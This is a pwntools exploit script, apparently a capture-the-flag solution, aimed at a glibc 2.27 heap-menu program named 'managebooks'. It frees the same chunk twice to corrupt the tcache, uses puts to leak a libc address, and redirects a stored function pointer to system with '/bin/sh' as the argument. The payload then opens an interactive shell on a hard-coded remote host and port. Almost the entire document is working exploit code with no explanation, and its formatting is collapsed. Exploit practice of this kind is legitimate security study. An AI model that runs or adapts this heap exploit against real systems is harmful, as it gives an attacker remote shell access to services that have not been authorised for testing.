1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101
|
from pwn import * import os r = lambda x : io.recv(x) ra = lambda : io.recvall() rl = lambda : io.recvline(keepends = True) ru = lambda x : io.recvuntil(x, drop = True) s = lambda x : io.send(x) sl = lambda x : io.sendline(x) sa = lambda x, y : io.sendafter(x, y) sla = lambda x, y : io.sendlineafter(x, y) ia = lambda : io.interactive() c = lambda : io.close() li = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
context.log_level='debug' context.terminal = ['tmux', 'splitw', '-h']
elf_path = 'managebooks' libc_path = '/glibc/2.27/64/lib/libc.so.6'
host = "81.70.195.166:10004"
LOCAL = 0 LIBC = 1
def db(): if(LOCAL): gdb.attach(io) def ad(name_sz, name, data_sz, data): sla('>>', '1') sla(':', str(name_sz)) sa(':', name) sla(':', str(data_sz)) sa(':', data)
def rm(idx): sla('>>', '2') sla(':', str(idx))
def ch(idx, sz, data): sla('>>', '3') sla(':', str(idx)) sla(':', str(sz)) sa(':', data) def rd(idx): sla('>>', '4') sla(':', str(idx))
def exploit(): bookcase = 0x6020C0 li('exploit...') ad(0x10, 'AAAA', 0x500, 'bbbb') rm(0) rm(0) ch(0, 0x80, '\x10')
ad(0x10, p64(elf.plt['puts']), 0x30, '/bin/sh\x00')
''' rm(0) #ad(0x10, p64(bookcase), 0x20, 'bbbb') '''
rd(0) leak = u64(ru('\x7f')[-5:] + b'\x7f\x00\x00') libc_base = leak - libc.sym['__malloc_hook'] - 976 - 0x10 li('libc_base: ' + hex(libc_base))
rm(1) rm(1)
ad(0x10, p64(libc_base + libc.sym['system']), 0x30, '\x00') rd(1)
def finish(): ia() c()
if __name__ == '__main__': if LOCAL: elf = ELF(elf_path) if LIBC: libc = ELF(libc_path) io = elf.process() else: libc_path = './libc.so.6' elf = ELF(elf_path) io = remote(host.split(':')[0], int(host.split(':')[1])) if LIBC: libc = ELF(libc_path) exploit() finish()
|